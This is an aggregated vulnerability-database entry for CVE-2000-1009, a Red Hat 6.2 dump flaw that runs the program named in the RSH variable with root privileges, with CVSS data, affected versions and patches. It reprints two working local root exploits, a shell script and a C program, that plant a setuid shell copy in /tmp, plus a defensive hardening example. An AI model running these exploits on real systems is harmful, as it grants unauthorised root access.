CVE-2000-1009
CVSS 7.2
Published: 2000-12-11 00:00:00
Revised: 2008-09-05 16:22:25

[Original] dump in Red Hat Linux 6.2 trusts the pathname specified by the RSH environmental variable, which allows local users to obtain root privileges by modifying the RSH variable to point to a Trojan horse program.


[CNNVD] Multiple Vendor dump Insecure Environment Variable Vulnerability (CNNVD-200012-058)

        The dump utility in Red Hat Linux 6.2 trusts the pathname given by the RSH environment variable. A local user can obtain root privileges by pointing the RSH variable at a Trojan horse program.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:redhat:linux:6.2    Red Hat Linux 6.2
cpe:/o:trustix:secure_linux:1.1    Trustix Secure Linux 1.1

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1009
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1009
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-058
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1871
(VENDOR_ADVISORY)  BID  1871
http://xforce.iss.net/static/5437.php
(VENDOR_ADVISORY)  XF  linux-dump-execute-code
http://archives.neohapsis.com/archives/bugtraq/2000-10/0438.html
(UNKNOWN)  BUGTRAQ  20001030 Redhat 6.2 dump command executes external program with suid priviledge.

- Vulnerability information

Multiple Vendor dump Insecure Environment Variable Vulnerability
Severity: High    Type: Input validation
Published: 2000-12-11 00:00:00    Updated: 2005-10-20 00:00:00
Attack vector: Local
        The dump utility in Red Hat Linux 6.2 trusts the pathname given by the RSH environment variable. A local user can obtain root privileges by pointing the RSH variable at a Trojan horse program.

- Advisories and patches

        Patches available:
        RedHat dump 0.4 b15-1
        NetBSD NetBSD 1.5
        NetBSD NetBSD 1.5.1
        Wirex Immunix OS 6.2

- Vulnerability information (193)

dump 0.4b15 Local Root Exploit (EDBID:193)
linux local
2000-11-19 Verified
0 Mat
N/A
#!/bin/sh

# Redhat 6.2 dump command executes external program 
# with suid privilege.
# Discovered by Mat <mat@hacksware.com>
# Written for and by a scriptkid Tasc ;P
# Remember, there's no cure for BSE

echo "dump-0.4b15 root exploit"
echo "Discovered by Mat <mat@hacksware.com>"
echo "-------------------------------------"
echo
DUMP=/sbin/dump
if [ ! -u $DUMP ]; then
  echo "$DUMP is NOT setuid on this system or does not exist at all!"
  echo
  exit 0
fi
export TAPE=iamlame:iamlame
export RSH=/tmp/rsh
cat >/tmp/rsh <<__eof__
#!/bin/sh
cp /bin/sh /tmp/sush
chmod 4755 /tmp/sush
__eof__
chmod 755 /tmp/rsh
/sbin/dump -0 /
echo
echo "Waiting for rootshell .... 5 seconds...."
sleep 5
/tmp/sush
id


# milw0rm.com [2000-11-19]
		

- Vulnerability information (206)

dump 0.4b15 exploit (Redhat 6.2) (EDBID:206)
linux local
2000-11-29 Verified
0 Mat
N/A
/*
**
**  dump-0.4b15x.c
**
**  dump-0.4b15 exploit:
**  Redhat 6.2 dump command executes
**  external program with suid privilege.
**
**  affected:
**     /sbin/dump
**     /sbin/dump.static
**     /sbin/restore
**     /sbin/restore.static
**
**  Bug found by mat@hacksware.com
**
**  This example was coded by md0claes@mdstud.chalmers.se
**  It was written for EDUCATIONAL PURPOSES ONLY.
**
**
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <ctype.h>		/* tolower() */
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RUNME     "/tmp/runme"      	/* tmp file		   */
#define SUID_PATH "/tmp/superdude"		/* the power of root */

void usage(char *pname)
{
 fprintf(stdout, "\nUsage: %s < d | s | r | p >\n\n", pname);
 fprintf(stdout,   "  d - exploit /sbin/dump\n");
 fprintf(stdout,   "  s - exploit /sbin/dump.static\n");
 fprintf(stdout,   "  r - exploit /sbin/restore\n");
 fprintf(stdout,   "  p - exploit /sbin/restore.static\n\n");
}

int main(int argc, char *argv[], char *envp[])
{
 int fd;
 pid_t pid;
 char *bad_env[] = { "TAPE=garbage:garbage", "RSH="RUNME, NULL }; /* envp passed to execle must be NULL-terminated */
 char   runbuf[] = { "#!/bin/sh\n/bin/cp /bin/bash "
                    SUID_PATH "\nchmod 6755 " SUID_PATH };

 char *suid[] = { SUID_PATH, NULL };
 char   *av[] = { "/sbin/restore.static", "restore.static",
                  "-t", "/tmp/foo" };

 if (argc != 2) {
  usage(argv[0]);
  exit(1);
 }

 switch(tolower(argv[1][0])) {

  case 'd':
   av[0] = "/sbin/dump";
   av[1] = "dump";
   av[2] = "-0";
   av[3] = "/";
   break;

  case 's':
   av[0] = "/sbin/dump.static";
   av[1] = "dump.static";
   av[2] = "-0";
   av[3] = "/";
   break;

  case 'r':
   av[0] = "/sbin/restore";
   av[1] = "restore";
   break;

  case 'p':
   break;

  default:
   usage(argv[0]);
   exit(1);
 }

 if ((fd = open(RUNME,O_WRONLY|O_CREAT|O_TRUNC, 0755)) == -1) {
  perror("open");
  exit(1);
 }

 if (write(fd, runbuf, sizeof(runbuf)) == -1) {
  perror("write");
  exit(1);
 }
 close(fd);

 if ((pid = fork()) < 0) {
  perror("fork");
  exit(1);
 }

 else if (pid == 0) {
  if (execle(av[0], av[1], av[2], av[3], NULL, bad_env) < 0) {
   perror("execle");
   _exit(1);
  }
 }

 sleep(1);
 unlink(RUNME);
 fprintf(stdout, "\nExploited %s \n", av[0]);
 fprintf(stdout, "Running " SUID_PATH "\n");
 execve(SUID_PATH, suid, envp);

 exit(0);
}


// milw0rm.com [2000-11-29]
		

- Vulnerability information

13747
Red Hat Linux dump RSH Environment Variable Subversion Privilege Escalation
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2000-10-30 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Multiple Vendor dump Insecure Environment Variables Vulnerability
Class: Input Validation Error    Bugtraq ID: 1871
Remote: No    Local: Yes
Published: 2000-10-31 12:00:00    Updated: 2009-07-11 03:56:00
This vulnerability was first publicly released to BugTraq by mat@ivntech.com on October 31, 2000.

- Affected program versions

Wirex Immunix OS 6.2
Trustix Secure Linux 1.1
RedHat dump 0.4 b15-1
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
RedHat Linux 7.0
NetBSD NetBSD 1.5.2
Mandriva Linux Mandrake 7.1
Mandriva Linux Mandrake 7.0
Mandriva Linux Mandrake 6.1
Mandriva Linux Mandrake 6.0
Conectiva Linux 5.1
Conectiva Linux 5.0

- Unaffected program versions

RedHat Linux 7.0
NetBSD NetBSD 1.5.2
Mandriva Linux Mandrake 7.1
Mandriva Linux Mandrake 7.0
Mandriva Linux Mandrake 6.1
Mandriva Linux Mandrake 6.0
Conectiva Linux 5.1
Conectiva Linux 5.0

- Vulnerability discussion

dump is a utility included with various UNIX clones for the purpose of dumping filesystems. A vulnerability exists in the dump package that allows suid execution of other executables.

The dump command depends on the RSH and TAPE environment variables for proper execution on Linux, and on the RCMD_CMD environment variable on NetBSD. A malicious user can set the RSH or RCMD_CMD environment variable to the path of any executable. When dump runs, the file referenced by that environment variable is executed with suid root privileges. Successful exploitation of this vulnerability results in root compromise.
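The root cause described above is a setuid program honouring an environment variable that names a program to execute. The following C example is added here for illustration; it is not code from dump, from the vendors, or from the exploit authors. It shows the pattern a setuid tool should use instead: ignore RSH entirely while running with elevated credentials, validate it even when unprivileged, drop privileges irreversibly before any exec, and give defenders a small inventory check for the setuid bit on the binaries listed on this page. The fallback path /usr/bin/rsh and the function names (running_privileged, choose_rsh, drop_privileges, is_setuid) are assumptions for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Compiled-in fallback used whenever RSH cannot be trusted (assumed path). */
#define DEFAULT_RSH "/usr/bin/rsh"

/* 1 if the process holds credentials its invoker did not have (setuid/setgid). */
int running_privileged(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid)
{
    return ruid != euid || rgid != egid;
}

/* Select the remote-shell program for a host:file TAPE target.
 * The flaw on this page is the pattern "if RSH is set, execute it":
 * under setuid root that runs the invoker's choice of binary as root.
 * Hardened rule: when privileged, ignore the variable entirely; when not
 * privileged, still require an absolute path free of shell metacharacters
 * (a stray space or ';' in a program path usually signals misuse). */
const char *choose_rsh(const char *env_rsh, int privileged)
{
    if (privileged || env_rsh == NULL || env_rsh[0] != '/')
        return DEFAULT_RSH;
    if (strpbrk(env_rsh, " \t\n;|&$`<>()") != NULL)
        return DEFAULT_RSH;
    return env_rsh;
}

/* Permanently give up setuid/setgid privileges before exec'ing anything the
 * user can influence. Returns 0 on success, -1 if the drop failed or could
 * be undone. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    if (setgid(rgid) != 0)          /* group first, while still able to */
        return -1;
    if (setuid(ruid) != 0)
        return -1;
    if (geteuid() != ruid || getegid() != rgid)
        return -1;
    /* A real drop cannot be reversed: regaining uid 0 must now fail. */
    if (ruid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

/* Inventory check: 1 if path exists and carries the setuid bit, 0 otherwise.
 * Run over /sbin/dump, /sbin/restore and their .static variants (the
 * binaries named on this page) to see whether the risky mode is present. */
int is_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return 0;
    return (st.st_mode & S_ISUID) != 0;
}

int main(void)
{
    /* Constructed inputs mirroring the environment the published exploit sets. */
    const char *tape = "iamlame:iamlame";
    const char *attacker_rsh = "/tmp/rsh";
    const char *listed[] = { "/sbin/dump", "/sbin/dump.static",
                             "/sbin/restore", "/sbin/restore.static" };
    int priv = running_privileged(getuid(), geteuid(), getgid(), getegid());
    size_t i;

    printf("TAPE=%s -> remote target, an rsh program will be needed\n", tape);
    printf("RSH=%s, privileged=%d -> would run %s\n",
           attacker_rsh, priv, choose_rsh(attacker_rsh, priv));
    printf("RSH=%s, privileged=1 -> would run %s\n",
           attacker_rsh, choose_rsh(attacker_rsh, 1));

    for (i = 0; i < sizeof listed / sizeof listed[0]; i++)
        printf("%-22s setuid: %s\n", listed[i],
               is_setuid(listed[i]) ? "YES" : "no / absent");

    return drop_privileges() == 0 ? 0 : 1;
}
```

The ordering in drop_privileges matters: the group id is dropped before the user id because once the effective uid is no longer 0 the setgid call would fail, and the final setuid(0) probe confirms the drop is permanent rather than a temporary seteuid switch.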

- Exploit

This exploit was first posted to Bugtraq by Claes Nyberg <md0claes@mdstud.chalmers.se> on November 2, 2000.

- Solution

Patches available:

RedHat dump 0.4 b15-1
NetBSD NetBSD 1.5
NetBSD NetBSD 1.5.1
Wirex Immunix OS 6.2

- Related references
